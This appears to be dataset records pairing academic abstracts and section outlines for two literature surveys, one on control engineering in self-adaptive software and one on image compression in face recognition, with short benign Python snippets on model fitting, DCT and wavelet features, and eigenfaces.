resource usage; regulating service levels to enforce service level agreements; and adapting to disturbances such as changes in workloads. Developing control systems that address these problems involves challenges related to modeling the managed element (plant); handing sensor data that are noisy, incomplete, and inconsistent; dealing with effectors that have complex effects that often do not correspond well to the control objectives; and designing control systems (especially filters, the choice of measured outputs, and time delays). --- paper_title: Honoring SLAs on cloud computing services: A control perspective paper_content: This work contains a short survey of recent results in the literature with a view to opening up new research directions for the problem of honoring SLAs on cloud computing services. This is a new problem that has attracted significant interest recently, due to the urgent need for providers to provide reliable, customized and QoS guaranteed computing dynamic environments for end-users as agreed in contracts on the basis of certain Service Level Agreements (SLAs). Honoring SLAs is a multi-faceted problem that may involve optimal use of the available resources, optimization of the system's performance and availability or maximization of the provider's revenue and it poses a significant challenge for researchers and system administrators due to the volatile, huge and unpredictable Web environments where these computing systems reside. The use of algorithms possessing run-time adaptation features, such as dynamic resource allocation, admission control and optimization becomes an absolute must. 
As a continuation of the recent successful application of control theory concepts and methods to the computing systems area, our survey indicates that the problem of honoring SLAs on cloud computing services is a new interesting application for control theory and that researchers can benefit significantly from a number of well-known modern control methodologies, such as hybrid, supervisory, hierarchical and model predictive control. --- paper_title: Introduction to control theory and its application to computing systems paper_content: Feedback control is central to managing computing systems and data networks. Unfortunately, computing practitioners typically approach the design of feedback control in an ad hoc manner. Control theory provides a systematic approach to designing feedback loops that are stable in that they avoid wild oscillations, accurate in that they achieve objectives such as target response times for service level management, and settle quickly to their steady state values. This paper provides an introduction to control theory for computing practitioners with an emphasis on applications in the areas of database systems, real-time systems, virtualized servers, and power management. --- paper_title: What does control theory bring to systems research? paper_content: Feedback mechanisms can help today's increasingly complex computer systems adapt to changes in workloads or operating conditions. Control theory offers a principled way for designing feedback loops to deal with unpredictable changes, uncertainties, and disturbances in systems. We provide an overview of the joint research at HP Labs and University of Michigan in the past few years, where control theory was applied to automated resource and service level management in data centers. We highlight the key benefits of a control-theoretic approach for systems research, and present specific examples from our experience of designing adaptive resource control systems where this approach worked well. In addition, we outline the main limitations of this approach, and discuss the lessons learned from our experience. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Software Engineering for Self-Adaptive Systems paper_content: One of the main goals of a self-adaptable software system is to meet the required Quality of Service (QoS) by autonomously modifying its structure/behavior in response to changes in the supporting infrastructure and surrounding physical environment. A key issue in the design and development of such system is the assessment of their effectiveness, both in terms of their ability to meet the required QoS under different operating conditions, and in terms of the costs involved by the reconfiguration process, which could outweigh the benefit of the reconfiguration. This paper introduces an approach to support this assessment, with a focus on performance and dependability attributes. 
Our approach is based on the idea of defining a model transformation chain that maps a “design oriented” model of the system to an “analysis oriented” model that lends itself to the application of a suitable analysis methodology. We identify some key concepts that should be present in the design model of a dynamically adaptable system, and show how to devise a transformation from such a model to a target analysis models, focusing in particular on models of component or service oriented systems --- paper_title: A survey on performance management for internet applications paper_content: Internet applications have become indispensable for many business and personal processes, turning the performance of these applications into a key issue. For this reason, recent research has comprehensively explored mechanisms for managing the performance of these applications, with special focus on dealing with overload situations and providing QoS guarantees to clients. This paper makes a survey on the different proposals in the literature for managing Internet applications' performance. We present a complete taxonomy that characterizes and classifies these proposals into several categories including request scheduling, admission control, service differentiation, dynamic resource management, service degradation, control theoretic approaches, works using queuing models, observation-based approaches that use runtime measurements, and overall approaches combining several mechanisms. For each work, we provide a brief description in order to provide the reader with a global understanding of the research progress in this area. Copyright © 2009 John Wiley & Sons, Ltd. --- paper_title: Does the technology acceptance model predict actual use? A systematic literature review paper_content: Context: The technology acceptance model (TAM) was proposed in 1989 as a means of predicting technology usage. However, it is usually validated by using a measure of behavioural intention to use (BI) rather than actual usage. Objective: This review examines the evidence that the TAM predicts actual usage using both subjective and objective measures of actual usage. Method: We performed a systematic literature review based on a search of six digital libraries, along with vote-counting meta-analysis to analyse the overall results. Results: The search identified 79 relevant empirical studies in 73 articles. The results show that BI is likely to be correlated with actual usage. However, the TAM variables perceived ease of use (PEU) and perceived usefulness (PU) are less likely to be correlated with actual usage. Conclusion: Care should be taken using the TAM outside the context in which it has been validated. --- paper_title: Empirical studies of agile software development : A systematic review paper_content: Agile software development represents a major departure from traditional, plan-based approaches to software engineering. A systematic review of empirical studies of agile software development up to and including 2005 was conducted. The search strategy identified 1996 studies, of which 36 were identified as empirical studies. The studies were grouped into four themes: introduction and adoption, human and social factors, perceptions on agile methods, and comparative studies. The review investigates what is currently known about the benefits and limitations of, and the strength of evidence for, agile methods. Implications for research and practice are presented. 
The main implication for research is a need for more and better empirical studies of agile software development within a common research agenda. For the industrial readership, the review provides a map of findings, according to topic, that can be compared for relevance to their own settings and situations. --- paper_title: Research challenges in control engineering of computing systems paper_content: A wide variety of software systems employ closed loops (feedback) to achieve service level objectives and to optimize resource usage. Control theory provides a systematic approach to constructing closed loop systems, and is widely used in disciplines such as mechanical and electrical engineering. This paper describes recent advances in applying control theory to computing systems, and identifies research challenges to address so that control engineering can be widely used by software practitioners. --- paper_title: Self-adaptive software: Landscape and research challenges paper_content: Software systems dealing with distributed applications in changing environments normally require human supervision to continue operation in all conditions. These (re-)configuring, troubleshooting, and in general maintenance tasks lead to costly and time-consuming procedures during the operating phase. These problems are primarily due to the open-loop structure often followed in software development. Therefore, there is a high demand for management complexity reduction, management automation, robustness, and achieving all of the desired quality requirements within a reasonable cost and time range during operation. Self-adaptive software is a response to these demands; it is a closed-loop system with a feedback loop aiming to adjust itself to changes during its operation. These changes may stem from the software system's self (internal causes, e.g., failure) or context (external events, e.g., increasing requests from users). Such a system is required to monitor itself and its context, detect significant changes, decide how to react, and act to execute such decisions. These processes depend on adaptation properties (called self-* properties), domain characteristics (context information or models), and preferences of stakeholders. Noting these requirements, it is widely believed that new models and frameworks are needed to design self-adaptive software. This survey article presents a taxonomy, based on concerns of adaptation, that is, how, what, when and where, towards providing a unified view of this emerging area. Moreover, as adaptive systems are encountered in many disciplines, it is imperative to learn from the theories and models developed in these other areas. This survey article presents a landscape of research in self-adaptive software by highlighting relevant disciplines and some prominent research projects. This landscape helps to identify the underlying research gaps and elaborates on the corresponding challenges. --- paper_title: A systematic survey on the design of self-adaptive software systems using control engineering approaches paper_content: Control engineering approaches have been identified as a promising tool to integrate self-adaptive capabilities into software systems. Introduction of the feedback loop and controller into the management system potentially enables the software systems to achieve the runtime performance objectives and maintain the integrity of the system when they are operating in unpredictable and dynamic environments. 
There is a large body of literature that has proposed control engineering solutions for different application domains, handling different performance variables and control objectives. However, the relevant literature is scattered over different conference proceedings, journals and research communities. Consequently, conducting a survey to analyze and classify the existing literature is a useful, yet a challenging task. This paper presents the results of a systematic survey that includes classification and analysis of 161 papers in the existing literature. In order to capture the characteristics of the control solutions proposed in these papers we introduce a taxonomy as a basis for classification of all articles. Finally, survey results are presented, including quantitative, cross and trend analysis. --- paper_title: What does control theory bring to systems research? paper_content: Feedback mechanisms can help today's increasingly complex computer systems adapt to changes in workloads or operating conditions. Control theory offers a principled way for designing feedback loops to deal with unpredictable changes, uncertainties, and disturbances in systems. We provide an overview of the joint research at HP Labs and University of Michigan in the past few years, where control theory was applied to automated resource and service level management in data centers. We highlight the key benefits of a control-theoretic approach for systems research, and present specific examples from our experience of designing adaptive resource control systems where this approach worked well. In addition, we outline the main limitations of this approach, and discuss the lessons learned from our experience. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Software Engineering for Self-Adaptive Systems paper_content: One of the main goals of a self-adaptable software system is to meet the required Quality of Service (QoS) by autonomously modifying its structure/behavior in response to changes in the supporting infrastructure and surrounding physical environment. A key issue in the design and development of such system is the assessment of their effectiveness, both in terms of their ability to meet the required QoS under different operating conditions, and in terms of the costs involved by the reconfiguration process, which could outweigh the benefit of the reconfiguration. This paper introduces an approach to support this assessment, with a focus on performance and dependability attributes. Our approach is based on the idea of defining a model transformation chain that maps a “design oriented” model of the system to an “analysis oriented” model that lends itself to the application of a suitable analysis methodology. 
We identify some key concepts that should be present in the design model of a dynamically adaptable system, and show how to devise a transformation from such a model to a target analysis models, focusing in particular on models of component or service oriented systems --- paper_title: A survey on performance management for internet applications paper_content: Internet applications have become indispensable for many business and personal processes, turning the performance of these applications into a key issue. For this reason, recent research has comprehensively explored mechanisms for managing the performance of these applications, with special focus on dealing with overload situations and providing QoS guarantees to clients. This paper makes a survey on the different proposals in the literature for managing Internet applications' performance. We present a complete taxonomy that characterizes and classifies these proposals into several categories including request scheduling, admission control, service differentiation, dynamic resource management, service degradation, control theoretic approaches, works using queuing models, observation-based approaches that use runtime measurements, and overall approaches combining several mechanisms. For each work, we provide a brief description in order to provide the reader with a global understanding of the research progress in this area. Copyright © 2009 John Wiley & Sons, Ltd. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: A multi-model framework to implement self-managing control systems for QoS management paper_content: Many control theory based approaches have been proposed to provide QoS assurance in increasingly complex software systems. These approaches generally use single model based, fixed or adaptive control techniques for QoS management of such systems. With varying system dynamics and unpredictable environmental changes, however, it is difficult to design a single model or controller to achieve the desired QoS performance across all the operating regions of these systems. In this paper, we propose a multi-model framework to capture the multi-model nature of software systems and implement self-managing control systems for them. 
A reference-model and extendable class library are introduced to implement such self-managing control systems. The proposed approach is also validated and compared to fixed and adaptive control schemes through a range of experiments. --- paper_title: A systematic survey on the design of self-adaptive software systems using control engineering approaches paper_content: Control engineering approaches have been identified as a promising tool to integrate self-adaptive capabilities into software systems. Introduction of the feedback loop and controller into the management system potentially enables the software systems to achieve the runtime performance objectives and maintain the integrity of the system when they are operating in unpredictable and dynamic environments. There is a large body of literature that has proposed control engineering solutions for different application domains, handling different performance variables and control objectives. However, the relevant literature is scattered over different conference proceedings, journals and research communities. Consequently, conducting a survey to analyze and classify the existing literature is a useful, yet a challenging task. This paper presents the results of a systematic survey that includes classification and analysis of 161 papers in the existing literature. In order to capture the characteristics of the control solutions proposed in these papers we introduce a taxonomy as a basis for classification of all articles. Finally, survey results are presented, including quantitative, cross and trend analysis. --- paper_title: Introduction to control theory and its application to computing systems paper_content: Feedback control is central to managing computing systems and data networks. Unfortunately, computing practitioners typically approach the design of feedback control in an ad hoc manner. Control theory provides a systematic approach to designing feedback loops that are stable in that they avoid wild oscillations, accurate in that they achieve objectives such as target response times for service level management, and settle quickly to their steady state values. This paper provides an introduction to control theory for computing practitioners with an emphasis on applications in the areas of database systems, real-time systems, virtualized servers, and power management. ---
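The control-theory texts cited above typically model a managed computing system as a first-order difference equation y(k+1) = a*y(k) + b*u(k) identified from logged data (for example, u = maximum connected users, y = response time). The short sketch below shows one way such a model could be fitted by least squares; the logged values are invented purely for illustration.

# Illustrative least-squares fit of the first-order model y(k+1) = a*y(k) + b*u(k).
# The sample data below is made up for demonstration only.
import numpy as np

u = np.array([10, 20, 20, 30, 30, 40], dtype=float)   # control input log
y = np.array([0.2, 0.25, 0.4, 0.45, 0.6, 0.65])       # measured output log

X = np.column_stack([y[:-1], u[:-1]])                  # regressors y(k), u(k)
a, b = np.linalg.lstsq(X, y[1:], rcond=None)[0]        # fit y(k+1)
print(f"identified model: y(k+1) = {a:.3f}*y(k) + {b:.4f}*u(k)")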
Title: A systematic survey on the design of self-adaptive software systems using control engineering approaches
Section 1: INTRODUCTION
Description 1: Describe the motivation, background, and objectives of the survey, including the importance of control engineering approaches in self-adaptive software systems.
Section 2: RELATED WORK
Description 2: Discuss previous surveys and related work in the field of applying control engineering to software system management, highlighting how this survey differs.
Section 3: REVIEW METHOD
Description 3: Explain the methodology used to conduct the systematic survey, including research questions, review protocol, and data extraction strategies.
Section 4: TAXONOMY
Description 4: Present the taxonomy developed to categorize the literature, detailing the characteristics of the target system, control system, and validation methods.
Section 5: SURVEY RESULTS
Description 5: Provide a detailed quantitative analysis and cross-analysis of the survey results based on the taxonomy, including observed trends and patterns.
Section 6: LIMITATIONS OF THE SURVEY
Description 6: Outline the limitations of the survey, including potential biases and areas where the survey might not exhaustively cover the literature.
Section 7: CONCLUSIONS
Description 7: Summarize the findings of the survey, discussing the implications and potential future research directions in the field of self-adaptive software systems using control engineering approaches.
1 Image Compression in Face Recognition-a Literature Survey
8
--- paper_title: The JPEG still picture compression standard paper_content: For the past few years, a joint ISO/CCITT committee known as JPEG (Joint Photographic Experts Group) has been working to establish the first international compression standard for continuous-tone still images, both grayscale and color. JPEG’s proposed standard aims to be generic, to support a wide variety of applications for continuous-tone images. To meet the differing needs of many applications, the JPEG standard includes two basic compression methods, each with various modes of operation. A DCT-based method is specified for “lossy” compression, and a predictive method for “lossless” compression. JPEG features a simple lossy technique known as the Baseline method, a subset of the other DCT-based modes of operation. The Baseline method has been by far the most widely implemented JPEG method to date, and is sufficient in its own right for a large number of applications. This article provides an overview of the JPEG standard, and focuses in detail on the Baseline method. --- paper_title: Effects of JPEG and JPEG2000 Compression on Face Recognition paper_content: In this paper we analyse the effects that JPEG and JPEG2000 compression have on subspace appearance-based face recognition algorithms. This is the first comprehensive study of standard JPEG2000 compression effects on face recognition, as well as an extension of existing experiments for JPEG compression. A wide range of bitrates (compression ratios) was used on probe images and results are reported for 12 different subspace face recognition algorithms. Effects of image compression on recognition performance are of interest in applications where image storage space and image transmission time are of critical importance. It will be shown not only that compression does not deteriorate performance but that it, in some cases, even improves it slightly. Some unexpected effects will be presented (like the ability of JPEG2000 to capture the information essential for recognizing changes caused by images taken later in time) and lines of further research suggested. --- paper_title: Illumination-tolerant face verification of low-bit-rate JPEG2000 wavelet images with advanced correlation filters for handheld devices paper_content: Face recognition on mobile devices, such as personal digital assistants and cell phones, is a big challenge owing to the limited computational resources available to run verifications on the devices themselves. One approach is to transmit the captured face images by use of the cell-phone connection and to run the verification on a remote station. However, owing to limitations in communication bandwidth, it may be necessary to transmit a compressed version of the image. We propose using the image compression standard JPEG2000, which is a wavelet-based compression engine used to compress the face images to low bit rates suitable for transmission over low-bandwidth communication channels. At the receiver end, the face images are reconstructed with a JPEG2000 decoder and are fed into the verification engine. We explore how advanced correlation filters, such as the minimum average correlation energy filter [Appl. Opt. 26, 3633 (1987)] and its variants, perform by using face images captured under different illumination conditions and encoded with different bit rates under the JPEG2000 wavelet-encoding standard.
We evaluate the performance of these filters by using illumination variations from the Carnegie Mellon University’s Pose, Illumination, and Expression (PIE) face database. We also demonstrate the tolerance of these filters to noisy versions of images with illumination variations. --- paper_title: A Critical Evaluation of Image and Video Indexing Techniques in the Compressed Domain paper_content: Abstract Image and video indexing techniques are crucial in multimedia applications. A number of indexing techniques that operate in the pixel domain have been reported in the literature. The advent of compression standards has led to the proliferation of indexing techniques in the compressed domain. In this paper, we present a critical review of the compressed domain indexing techniques proposed in the literature. These include transform domain techniques using Fourier transform, cosine transform, Karhunen–Loeve transform, Subbands and wavelets, and spatial domain techniques using vector quantization and fractals. In addition, temporal indexing techniques using motion vectors are also discussed. --- paper_title: Face detection in the compressed domain paper_content: Face detection is important in many algorithms in the areas of machine object recognition and pattern recognition. The kaleidoscope of applications for face detection extends across automatic image and home video content annotation, face-image stabilisation and face recognition systems. By using information derived from colour, luminosity and frequency the face detection algorithm proposed in this paper aims to determine the location of multiple frontal and non-frontal faces in compressed MPEG-1, MPEG-2 video or JPEG image content. The described algorithm requires only low computational resources on CE devices and offers at one and the same time extremely high detection rates. --- paper_title: Object Recognition in Compressed Imagery paper_content: Image-based applications can save time and space by operating on compressed data. The problem is that most mid- and high-level image operations, such as object recognition, are formulated as sequences of operations in the image domain. Such methods need direct access to pixel information as a starting point, but the pixel information in a compressed image stream is not immediately accessible. In this paper we show how to perform object recognition directly on compressed images (JPEG) and index frames from video streams (MPEG I-frames) without recovering explicit pixel information. The approach uses eigenvectors constructed from compressed image data. Our performance results show that a five-fold speedup can be gained by using compressed data. --- paper_title: Application of the DCT Energy Histogram for Face Recognition paper_content: In this paper, we investigate the face recognition problem via energy histogram of the DCT coefficients. Several issues related to the recognition performance are discussed, In particular the issue of histogram bin sizes and feature sets. In addition, we propose a technique for selecting the classification threshold incrementally. Experimentation was conducted on the Yale face database and results indicated that the threshold obtained via the proposed technique provides a balanced recognition in term of precision and recall. Furthermore, it demonstrated that the energy histogram algorithm outperformed the well-known Eigenface algorithm. 
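The DCT energy-histogram entries above use the distribution of block-DCT coefficient energies as an image or face feature. A rough Python sketch of that kind of feature extraction is given below; the block size, bin count, and energy range are arbitrary choices, the input is assumed to be a 2-D grayscale numpy array, and this is only an approximation of the cited methods, not any one of them.

# Illustrative energy histogram of block-DCT coefficients (parameters arbitrary).
import numpy as np
from scipy.fftpack import dct

def dct2(block):
    return dct(dct(block, axis=0, norm='ortho'), axis=1, norm='ortho')

def dct_energy_histogram(gray_image, block=8, bins=32, max_energy=1e4):
    h, w = gray_image.shape
    energies = []
    for i in range(0, h - block + 1, block):
        for j in range(0, w - block + 1, block):
            c = dct2(gray_image[i:i+block, j:j+block].astype(float))
            energies.extend(c[u, v] ** 2
                            for u in range(block) for v in range(block)
                            if (u, v) != (0, 0))          # skip the DC term
    hist, _ = np.histogram(energies, bins=bins, range=(0, max_energy))
    return hist / max(hist.sum(), 1)                      # normalised feature vector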
--- paper_title: Image Indexing in DCT Domain paper_content: With the rapid growing of multimedia technology, more and more multimedia content are disseminated in the network or stored in the database. Image data is one of the multimedia types to be seen or accessed for the users in the Internet or from the database. Searching the related images by the querying image content is helpful to the management of image database. Most of the images are joint photographic experts group (JPEG) file format. Full decompression of JPEG file to spatial domain to extract the features for indexing takes time. Therefore, the research of JPEG file format indexing technique is worthwhile because it does not need the extra time to fulfill inverse discrete cosine transform (IDCT). Essentially, the proposed method is a content-based image retrieval (CBIR) system that can retrieval the images from the image database. In order to increase the efficiency of processing time, the proposed method fulfills partial decoding to JPEG file directly instead of full decoding and the feature vector extracted from the partial decoding can ensure the precise indexing as well. The system can output ranked images according to the similarity values in short time. In addition, the system has the property of robustness to rotation, scaling, translation, darkening, lightening, cropping, noise corruption, etc. Simulation results demonstrate that the performance of the proposed method outperforms the other existing DCT-based image indexing skills both from the aspects of robustness and processing burden --- paper_title: Pattern recognition in compressed DCT domain paper_content: Images and video are currently predominantly handled in compressed form. Block-based compression standards are by far the most widespread. It is thus important to devise information processing methods operating directly in compressed domain. In this paper we investigate this possibility on the example of simple face information processing method based on the DCT (discrete cosine transform) blocks. We use patterns of quantized 4x4 DCT blocks for representing local picture information. These patterns at different quantization levels provide very flexible representation of picture information. We represent global information in pictures by histograms of quantized DCT pattern distributions. The approach is tested on database of face images and it is shown that despite its simplicity provides good results in the face recognition problem. --- paper_title: Exploiting Image Indexing Techniques in DCT domain paper_content: This paper is concerned with the indexing and retrieval of images based on features extracted directly from the JPEG discrete cosine transform (DCT) domain. We examine possible ways of manipulating DCT coe$cients by standard image analysis approaches to describe image shape, texture, and color. Through the Mandala transformation, our approach groups a subset of DCT coe$cients to form ten blocks. Each block represents a particular frequency content of the original image. Two blocks are used to model rough object shape; nine blocks to describe subband properties; and one block to compute color distribution. As a result, the amount of data used for processing and analysis is signi"cantly reduced. This can lead to simple yet e$cient ways of indexing and retrieval in a large-scale image database. Experimental results show that our proposed approach o!ers superior indexing speed without signi"cantly sacri"cing the retrieval accuracy. 
2001 Pattern Recognition Society. Published by Elsevier Science Ltd. All rights reserved. --- paper_title: Image retrieval based on energy histograms of the low frequency DCT coefficients paper_content: With the increasing popularity of the use of compressed images, an intuitive approach for lowering computational complexity towards a practically efficient image retrieval system is to propose a scheme that is able to perform retrieval computation directly in the compressed domain. In this paper, we investigate the use of energy histograms of the low frequency DCT coefficients as features for the retrieval of DCT compressed images. We propose a feature set that is able to identify similarities on changes of image-representation due to several lossless DCT transformations. We then use the features to construct an image retrieval system based on the real-time image retrieval model. We observe that the proposed features are sufficient for performing high level retrieval on medium size image databases. And by introducing transpositional symmetry, the features can be brought to accommodate several lossless DCT transformations such as horizontal and vertical mirroring, rotating, transposing, and transversing. --- paper_title: Encoding and recognition of faces based on the human visual model and DCT paper_content: For encoding and recognizing human faces in monochrome images, we propose a new method based on a combination of the discrete cosine transform (DCT), principal component analysis (PCA), and the characteristics of the Human Visual System. The novel aspect of the proposed non-Bayesian, approach is that, in the course of the recognition of face images, we also achieve image compression (in the form of encoding). With the help of examples, we demonstrate the superiority and advantages of the new method in comparison with the results found in the literature. --- paper_title: Pattern retrieval using optimized compression transform paper_content: Images and video are currently predominantly handled in compressed form. Block-based compression standards are by far the most widespread. It is thus important to devise information processing methods operating directly in compressed domain. In this paper we investigate this possibility on the example of simple face information processing method based on the H.264 AC Transformed blocks. We use patterns of quantized 4x4 transformed blocks for representing local picture information. These patterns at different quantization levels provide very flexible representation of picture information. By combining both the AC and DC information, we represent global information in pictures by histograms of quantized block pattern distributions. The approach is tested on FERET database of face images and it is shown that despite its simplicity provides good results in the face recognition problem. --- paper_title: Exploiting the JPEG compression scheme for image retrieval paper_content: We address the problem of retrieving images from a large database using an image as a query. The method is specifically aimed at databases that store images in JPEG format, and works in the compressed domain to create index keys. A key is generated for each image in the database and is matched with the key generated for the query image. The keys are independent of the size of the image. Images that have similar keys are assumed to be similar, but there is no semantic meaning to the similarity. 
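Once compressed-domain keys such as the histograms above are available, retrieval reduces to ranking database images by key similarity. The sketch below uses histogram intersection as one possible similarity measure; the feature-extraction step and the database layout are assumptions for illustration, not prescriptions from the cited papers.

# Illustrative compressed-domain retrieval step: rank images by key similarity.
import numpy as np

def histogram_intersection(h1, h2):
    return float(np.minimum(h1, h2).sum())

def rank_by_similarity(query_key, database_keys):
    # database_keys: {image_id: normalised histogram}
    scores = {img: histogram_intersection(query_key, key)
              for img, key in database_keys.items()}
    return sorted(scores, key=scores.get, reverse=True)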
--- paper_title: Direct content access and extraction from JPEG compressed images paper_content: Abstract In this paper, we propose a novel design of content access and extraction algorithm for compressed image browsing and indexing, which is critical for all visual information systems. By analyzing the relationship between DCT coefficients of one block of 8×8 pixels and its four sub-blocks of 4×4 pixels, the proposed algorithm extract an approximated image with smaller size for indexing and content browsing without incurring full decompression. While the computing cost is significantly lower than full decompression, the approximated image also reserves the content features, which are sufficient for indexing and browsing as evidenced by our extensive experiments. --- paper_title: Face Recognition Using the Discrete Cosine Transform paper_content: An accurate and robust face recognition system was developed and tested. This system exploits the feature extraction capabilities of the discrete cosine transform (DCT) and invokes certain normalization techniques that increase its robustness to variations in facial geometry and illumination. The method was tested on a variety of available face databases, including one collected at McGill University. The system was shown to perform very well when compared to other approaches. --- paper_title: Object Recognition in Compressed Imagery paper_content: Image-based applications can save time and space by operating on compressed data. The problem is that most mid- and high-level image operations, such as object recognition, are formulated as sequences of operations in the image domain. Such methods need direct access to pixel information as a starting point, but the pixel information in a compressed image stream is not immediately accessible. In this paper we show how to perform object recognition directly on compressed images (JPEG) and index frames from video streams (MPEG I-frames) without recovering explicit pixel information. The approach uses eigenvectors constructed from compressed image data. Our performance results show that a five-fold speedup can be gained by using compressed data. --- paper_title: When eigenfaces are combined with wavelets paper_content: This paper presents a novel and interesting combination of wavelet techniques and eigenfaces to extract features for face recognition. Eigenfaces reduce the dimensions of face vectors while wavelets reveal information that is unavailable in the original image. Extensive experiments have been conducted to test the new approach on the ORL face database, using a radial basis function neural network classifier. The results of the experiments are encouraging and the new approach is a step forward in face recognition. --- paper_title: Recognition in the wavelet domain: a survey paper_content: The use of wavelets has grown enormously since their original inception in the mid-1980s. Since the wavelet data repre- sentation combines spatial, frequency, and scale information in a sparse data representation, they are very useful in a number of image processing applications. This paper discusses current work in applying wavelets to object and pattern recognition. Feature extrac- tion methods and search algorithms for matching images are dis- cussed. Some important issues are the search for invariant repre- sentations, similarities between existing applications and the human visual system, and the derivation of wavelets that match specific targets. 
Results from several existing systems and areas for future research are presented. © 2001 SPIE and IS&T. --- paper_title: Face recognition by applying wavelet subband representation and kernel associative memory paper_content: In this paper, we propose an efficient face recognition scheme which has two features: 1) representation of face images by two-dimensional (2D) wavelet subband coefficients and 2) recognition by a modular, personalised classification method based on kernel associative memory models. Compared to PCA projections and low resolution "thumb-nail" image representations, wavelet subband coefficients can efficiently capture substantial facial features while keeping computational complexity low. As there are usually very limited samples, we constructed an associative memory (AM) model for each person and proposed to improve the performance of AM models by kernel methods. Specifically, we first applied kernel transforms to each possible training pair of faces sample and then mapped the high-dimensional feature space back to input space. Our scheme using modular autoassociative memory for face recognition is inspired by the same motivation as using autoencoders for optical character recognition (OCR), for which the advantages has been proven. By associative memory, all the prototypical faces of one particular person are used to reconstruct themselves and the reconstruction error for a probe face image is used to decide if the probe face is from the corresponding person. We carried out extensive experiments on three standard face recognition datasets, the FERET data, the XM2VTS data, and the ORL data. Detailed comparisons with earlier published results are provided and our proposed scheme offers better recognition accuracy on all of the face datasets. --- paper_title: Wavelet packet analysis for face recognition paper_content: Abstract A novel method for recognition of frontal views of human faces under roughly constant illumination is presented. The proposed scheme is based on the analysis of a wavelet packet decomposition of the face images. Each face image is first located and then, described by a subset of band filtered images containing wavelet coefficients. From these wavelet coefficients, which characterize the face texture, we build compact and meaningful feature vectors, using simple statistical measures. Then, we show how an efficient and reliable probabilistic metric derived from the Bhattacharrya distance can be used in order to classify the face feature vectors into person classes. Experimental results are presented using images from the FERET and the FACES databases. The efficiency of the proposed approach is analyzed according to the FERET evaluation procedure and by comparing our results with those obtained using the well-known Eigenfaces method. --- paper_title: Wavelet-based texture features can be extracted efficiently from compressed-domain for JPEG2000 coded images paper_content: The contribution of this paper is the development of a fast, subband-based JPEG2000 image indexing system in the compressed domain which achieves high memory efficiency. This is the extended work on a previously block-based indexing system. The feature extracted is the variance of each wavelet subband in the compressed domain with the emphasis that subbands are not buffered to maintain memory efficiency. Retrieval performance on VisTex image database indexing has shown the effectiveness and speed up of execution of the proposed features. 
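Several wavelet-domain entries above build features from subband statistics, for example the variance of each wavelet subband. The following sketch computes such a feature vector with the PyWavelets package; the wavelet family and decomposition level are arbitrary choices, and the cited systems differ in detail.

# Illustrative wavelet-subband feature vector: per-subband variance of a 2-level DWT.
import numpy as np
import pywt

def subband_variances(gray_image, wavelet='db4', level=2):
    coeffs = pywt.wavedec2(gray_image.astype(float), wavelet, level=level)
    features = [np.var(coeffs[0])]                       # approximation band
    for (cH, cV, cD) in coeffs[1:]:                      # detail bands per level
        features.extend([np.var(cH), np.var(cV), np.var(cD)])
    return np.asarray(features)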
--- paper_title: Discriminant waveletfaces and nearest feature classifiers for face recognition paper_content: Feature extraction, discriminant analysis, and classification rules are three crucial issues for face recognition. We present hybrid approaches that handle these three issues together. For feature extraction, we apply the multiresolution wavelet transform to extract the waveletface. We also perform linear discriminant analysis on waveletfaces to reinforce discriminant power. During classification, the nearest feature plane (NFP) and nearest feature space (NFS) classifiers are explored for robust decisions in the presence of wide facial variations. Their relationships to conventional nearest neighbor and nearest feature line classifiers are demonstrated. In the experiments, the discriminant waveletface incorporated with the NFS classifier achieves the best face recognition performance. ---
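Many of the subspace methods cited above (eigenfaces and their compressed-domain variants) project images onto a small PCA basis and match a probe to the nearest gallery projection. The sketch below is a generic version of that pipeline rather than the specific algorithm of any one paper; the training vectors, labels, and number of components are placeholders.

# Illustrative eigenface-style pipeline: PCA projection + nearest-neighbour match.
import numpy as np

def fit_eigenfaces(train_vectors, n_components=20):
    mean = train_vectors.mean(axis=0)
    centered = train_vectors - mean
    _, _, vt = np.linalg.svd(centered, full_matrices=False)
    basis = vt[:n_components]                 # principal directions ("eigenfaces")
    return mean, basis, centered @ basis.T    # projected gallery

def nearest_match(probe_vector, mean, basis, gallery_proj, gallery_labels):
    p = (probe_vector - mean) @ basis.T
    distances = np.linalg.norm(gallery_proj - p, axis=1)
    return gallery_labels[int(np.argmin(distances))]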
Title: Image Compression in Face Recognition-a Literature Survey
Section 1: Introduction
